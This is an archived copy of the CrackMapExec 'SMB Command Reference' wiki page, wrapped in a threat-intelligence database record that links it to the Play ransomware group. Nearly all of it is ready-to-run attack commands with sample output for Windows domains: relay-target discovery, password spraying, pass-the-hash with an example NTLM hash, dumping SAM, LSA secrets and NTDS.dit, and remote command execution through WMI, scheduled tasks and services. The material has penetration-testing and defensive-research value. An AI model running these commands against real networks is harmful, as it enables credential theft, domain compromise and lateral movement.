{
	"id": "6615aeb0-bc71-4b80-a549-2899064d7222",
	"created_at": "2026-04-06T01:29:49.397473Z",
	"updated_at": "2026-04-10T03:30:33.216456Z",
	"deleted_at": null,
	"sha1_hash": "afd7bef80b044eb7cd208bb20dbc3fd08466fc40",
	"title": "SMB Command Reference",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 97098,
	"plain_text": "SMB Command Reference\r\nBy byt3bl33d3r\r\nArchived: 2026-04-06 01:06:17 UTC\r\nSMB: Command Reference\r\nUpdated: 7/27/18\r\nCME Version:4.0.1dev\r\nNotes about command reference:\r\nThe following use cases assume you have a Kali Linux host connected to an internal network.\r\nFor the examples it is also assumed hosts are within a 192.168.1.0/24 IP space. If CME isnt giving output of\r\nanykind, you probably have something wrong with the command.\r\nMapping/Enumeration\r\nMap network hosts\r\nReturns a list of live hosts\r\n#~ cme smb 192.168.1.0/24\r\nExpected Results:\r\nSMB 192.168.1.101 445 DC2012A [*] Windows Server 2012 R2 Standard 9600 x64 (name:DC2012A\r\nSMB 192.168.1.102 445 DC2012B [*] Windows Server 2012 R2 Standard 9600 x64 (name:DC2012B)\r\nSMB 192.168.1.110 445 DC2016A [*] Windows Server 2016 Standard Evaluation 14393 x64 (name\r\nSMB 192.168.1.117 445 WIN10DESK1 [*] WIN10DESK1 x64 (name:WIN10DESK1) (domain:OCEAN) (signin\r\nGenerate Relay List\r\nMaps the network of live hosts and saves a list of only the hosts that dont require SMB signing.\r\nList format is one IP per line\r\n#~ cme smb 192.168.1.0/24 --gen-relay-list relaylistOutputFilename.txt\r\nExpected Results:\r\nhttps://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference\r\nPage 1 of 8\n\nSMB 192.168.1.101 445 DC2012A [*] Windows Server 2012 R2 Standard 9600 x64 (name:DC2012A\r\nSMB 192.168.1.102 445 DC2012B [*] Windows Server 2012 R2 Standard 9600 x64 (name:DC2012B)\r\nSMB 192.168.1.111 445 SERVER1 [*] Windows Server 2016 Standard Evaluation 14393 x64 (name\r\nSMB 192.168.1.117 445 WIN10DESK1 [*] WIN10DESK1 x64 (name:WIN10DESK1) (domain:OCEAN) (signin\r\n...SNIP...\r\n#~ cat relaylistOutputFilename.txt\r\n192.168.1.111\r\n192.168.1.117\r\nEnumerate shares and access\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --shares\r\nEnumerate active sessions\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sessions\r\nEnumerate disks\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --disks\r\nEnumerate logged on users\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --loggedon-users\r\nEnumerate domain users\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --users\r\nEnumerate users by bruteforcing RID\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --rid-brute\r\nEnumerate domain groups\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --groups\r\nhttps://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference\r\nPage 2 of 8\n\nEnumerate local groups\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-groups\r\nObtain domain password policy\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --pass-pol\r\nAuthentication + Checking Credentials (Domain)\r\nFailed logins result in a [-]\r\nSuccessful logins result in a [+] Domain\\Username:Password\r\nLocal admin access results in a (Pwn3d!) added after the login confirmation, shown below.\r\nSMB 192.168.1.101 445 HOSTNAME [+] DOMAIN\\Username:Password (Pwn3d!)\r\nThe following checks will attempt authentication to the entire /24 though a single target may also be used.\r\nUser/Password\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE'\r\nUser/Hash\r\nAfter obtaining credentials such as\r\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c:::\r\nyou can use both the full hash or just the nt hash (second half)\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT'\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH'\r\n#~ cme smb 192.168.1.0/24 -u Administrator -H '13b29964cc2480b4ef454c59562e675c'\r\n#~ cme smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c\r\nNull Sessions\r\n#~ cme smb 192.168.1.0/24 -u '' -p ''\r\nhttps://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference\r\nPage 3 of 8\n\nIf multiple domains are in play you may need to specify the target domain using -d\r\nFor example authenticating to the domain labnet.com\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p \"PASSWORDHERE\" -d LABNET\r\nUsing Username/Password Lists\r\nYou can use multiple usernames or passwords by seperating the names/passwords with a space.\r\n#~ cme smb 192.168.1.101 -u user1 user2 user3 -p Summer18\r\n#~ cme smb 192.168.1.101 -u user1 -p password1 password2 password3\r\nCME accepts txt files of usernames and passwords. One user/password per line. Watch out for account lockout!\r\n#~ cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18\r\n#~ cme smb 192.168.1.101 -u Administrator -p /path/to/passwords.txt\r\n*Note*: By default CME will exit after a successful login is found. Using the --continue-on-success flag will\r\ncontinue spraying even after a valid password is found. Usefull for spraying a single password against a large user\r\nlist Usage example:\r\n#~ cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18 --continue-on-success\r\nAuthentication/Checking credentials (Local)\r\nAdding --local-auth to any of the authentication commands with attempt to logon locally.\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth\r\n#~ cme smb 192.168.1.0/24 -u '' -p '' --local-auth\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT' --local-auth\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH' --local-auth\r\n#~ cme smb 192.168.1.0/24 -u localguy -H '13b29964cc2480b4ef454c59562e675c' --local-auth\r\n#~ cme smb 192.168.1.0/24 -u localguy -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c' --l\r\nResults will display the hostname next to the user:password\r\nSMB 192.168.1.101 445 HOSTNAME [+] HOSTNAME\\Username:Password (Pwn3d!)\r\nObtaining Credentials\r\nhttps://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference\r\nPage 4 of 8\n\nThe following examples use a username and plaintext password although user/hash combos work as well.\r\n*Requires Local Admin\r\n***Requires Domain Admin or Local Admin Priviledges on target Domain Controller\r\n*Dump SAM hashes using methods from secretsdump.py\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam\r\n*Dump LSA secrets using methods from secretsdump.py\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa\r\n***Dump the NTDS.dit from target DC using methods from secretsdump.py\r\n2 methods are available:\r\n(default) drsuapi - Uses drsuapi RPC interface create a handle, trigger replication, and combined with\r\nadditional drsuapi calls to convert the resultant linked-l\r\nvss - Uses the Volume Shadow copy Service\r\n#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds\r\n#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss\r\n***Dump the NTDS.dit password history from target DC using methods from\r\nsecretsdump.py\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-history\r\n***Show the pwdLastSet attribute for each NTDS.dit account\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --ntds-pwdLastSet\r\nSpidering Shares\r\nOptions for spidering shares of remote systems.\r\n***Spider the C drive for files with txt in the name (finds both sometxtfile.html\r\nand somefile.txt)\r\nhttps://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference\r\nPage 5 of 8\n\nNotice the '$' character has to be escaped. (example shown can be used as-is in a kali linux terminal)\r\n#~ cme SMB \u003cIP\u003e -u USER -p PASSWORD --spider C\\$ --pattern txt\r\nCommand Execution\r\nOptions for executing commands on remote systems.\r\nExecution Methods\r\nCME has three different command execution methods:\r\nwmiexec executes commands via WMI\r\natexec executes commands by scheduling a task with windows task scheduler\r\nsmbexec executes commands by creating and running a service\r\nBy default CME will fail over to a different execution method if one fails. It attempts to execute commands in the\r\nfollowing order:\r\n1. wmiexec\r\n2. atexec\r\n3. smbexec\r\nIf you want to force CME to use only one execution method you can specify which one using the --exec-method\r\nflag.\r\nThe command execution method is denoted in the Executed Command output line.\r\nWMIEXEC example, note the 'Executed command via wmiexec' output line.\r\nroot@EvilRick:~# cme smb 10.10.33.121 -u Administrator -p AAdmin\\!23 -X '$PSVersionTable' --exec-method wmiexec\r\nSMB 10.10.33.121 445 DESKTOP1 [*] Windows 7 Ultimate N 7601 Service Pack 1 x64 (name:DESKT\r\nSMB 10.10.33.121 445 DESKTOP1 [+] PACIFIC\\Administrator:AAdmin!23 (Pwn3d!)\r\nSMB 10.10.33.121 445 DESKTOP1 [+] Executed command via wmiexec\r\nSMB 10.10.33.121 445 DESKTOP1 Name Value\r\nSMB 10.10.33.121 445 DESKTOP1 ---- -----\r\nSMB 10.10.33.121 445 DESKTOP1 CLRVersion 2.0.50727.8793\r\nSMB 10.10.33.121 445 DESKTOP1 BuildVersion 6.1.7601.17514\r\nSMB 10.10.33.121 445 DESKTOP1 PSVersion 2.0\r\nSMB 10.10.33.121 445 DESKTOP1 WSManStackVersion 2.0\r\nSMB 10.10.33.121 445 DESKTOP1 PSCompatibleVersions {1.0, 2.0}\r\nSMB 10.10.33.121 445 DESKTOP1 SerializationVersion 1.1.0.1\r\nSMB 10.10.33.121 445 DESKTOP1 PSRemotingProtocolVersion 2.1\r\nExecuting Commands\r\nhttps://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference\r\nPage 6 of 8\n\nCurrently Broken in bleeding edge.\r\nIn the following example, we try to execute whoami on the target using the -x flag:\r\n#~ crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami\r\nSMB 192.168.10.11 445 WIN7BOX [*] Windows 7 Ultimate N 7601 Service Pack 1 x64 (name:WIN7B\r\nSMB 192.168.10.11 445 WIN7BOX [+] LAB\\Administrator:P@ssw0rd (Pwn3d!)\r\nSMB 192.168.10.11 445 WIN7BOX [+] Executed command\r\nSMB 192.168.10.11 445 WIN7BOX lab\\administrator\r\nExecuting Powershell Commands\r\nYou can also directly execute PowerShell commands using the -X flag:\r\n#~ crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable'\r\nSMB 192.168.10.11 445 WIN7BOX [*] Windows 7 Ultimate N 7601 Service Pack 1 x64 (name:WIN7\r\nSMB 192.168.10.11 445 WIN7BOX [+] LAB\\Administrator:P@ssw0rd (Pwn3d!)\r\nSMB 192.168.10.11 445 WIN7BOX [+] Executed command\r\nSMB 192.168.10.11 445 WIN7BOX Name Value\r\nSMB 192.168.10.11 445 WIN7BOX ---- -----\r\nSMB 192.168.10.11 445 WIN7BOX CLRVersion 2.0.50727.8793\r\nSMB 192.168.10.11 445 WIN7BOX BuildVersion 6.1.7601.17514\r\nSMB 192.168.10.11 445 WIN7BOX PSVersion 2.0\r\nSMB 192.168.10.11 445 WIN7BOX WSManStackVersion 2.0\r\nSMB 192.168.10.11 445 WIN7BOX PSCompatibleVersions {1.0, 2.0}\r\nSMB 192.168.10.11 445 WIN7BOX SerializationVersion 1.1.0.1\r\nSMB 192.168.10.11 445 WIN7BOX PSRemotingProtocolVersion 2.1\r\nPowershell commands can be forced to run in a 32bit process:\r\n#~ crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '[System.Environment]::Is64BitProcess' --force-SMB 192.168.10.11 445 WIN7BOX [*] Windows 7 Ultimate N 7601 Service Pack 1 x64 (name:WIN7\r\nSMB 192.168.10.11 445 WIN7BOX [+] LAB\\Administrator:P@ssw0rd (Pwn3d!)\r\nSMB 192.168.10.11 445 WIN7BOX [+] Executed command\r\nSMB 192.168.10.11 445 WIN7BOX false\r\nOther switches include:\r\n--no-output Does not retrieve command results\r\nWMI Query Execution\r\nhttps://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference\r\nPage 7 of 8\n\nSee more about wmi queries and syntax here: https://docs.microsoft.com/en-us/windows/desktop/wmisdk/invoking-a-synchronous-query\r\nIssues the specified WMI query\r\nUser/Password\r\n#~ cme smb 10.10.33.121 -u Administrator -p 'P@ssw0rd' --wmi \"SELECT * FROM Win32_logicalDisk WHERE DeviceID =\r\nSMB 192.168.10.11 445 WIN7BOX [*] Windows 7 Ultimate N 7601 Service Pack 1 x64 (name:WIN7B\r\nSMB 192.168.10.11 445 WIN7BOX [+] LAB\\Administrator:P@ssw0rd (Pwn3d!)\r\nSMB 192.168.10.11 445 WIN7BOX Caption =\u003e C:\r\nSMB 192.168.10.11 445 WIN7BOX Description =\u003e Local Fixed Disk\r\nSMB 192.168.10.11 445 WIN7BOX InstallDate =\u003e 0\r\nSMB 192.168.10.11 445 WIN7BOX Name =\u003e C:\r\nSMB 192.168.10.11 445 WIN7BOX Status =\u003e 0\r\nSMB 192.168.10.11 445 WIN7BOX Availability =\u003e 0\r\nSMB 192.168.10.11 445 WIN7BOX CreationClassName =\u003e Win32_LogicalDisk\r\nSMB 192.168.10.11 445 WIN7BOX ConfigManagerErrorCode =\u003e 0\r\nSMB 192.168.10.11 445 WIN7BOX ConfigManagerUserConfig =\u003e 0\r\nSMB 192.168.10.11 445 WIN7BOX DeviceID =\u003e C:\r\nTODO: 9/4/18\r\n-Spidering Shares needs updates for the different available flags. -Powershell Scripts obfuscation switches: --obfs\r\nand --clear-obfscripts -SMB modules: Probably will create a seperate section.\r\n-Figure out what/why change the wmi-namespace is about.\r\nWMI Namespace\r\nUser/Password\r\n#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --wmi-namespace 'root\\\\cimv2'\r\nSource: https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference\r\nhttps://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference"
	],
	"report_names": [
		"SMB-Command-Reference"
	],
	"threat_actors": [
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775438989,
	"ts_updated_at": 1775791833,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/afd7bef80b044eb7cd208bb20dbc3fd08466fc40.pdf",
		"text": "https://archive.orkl.eu/afd7bef80b044eb7cd208bb20dbc3fd08466fc40.txt",
		"img": "https://archive.orkl.eu/afd7bef80b044eb7cd208bb20dbc3fd08466fc40.jpg"
	}
}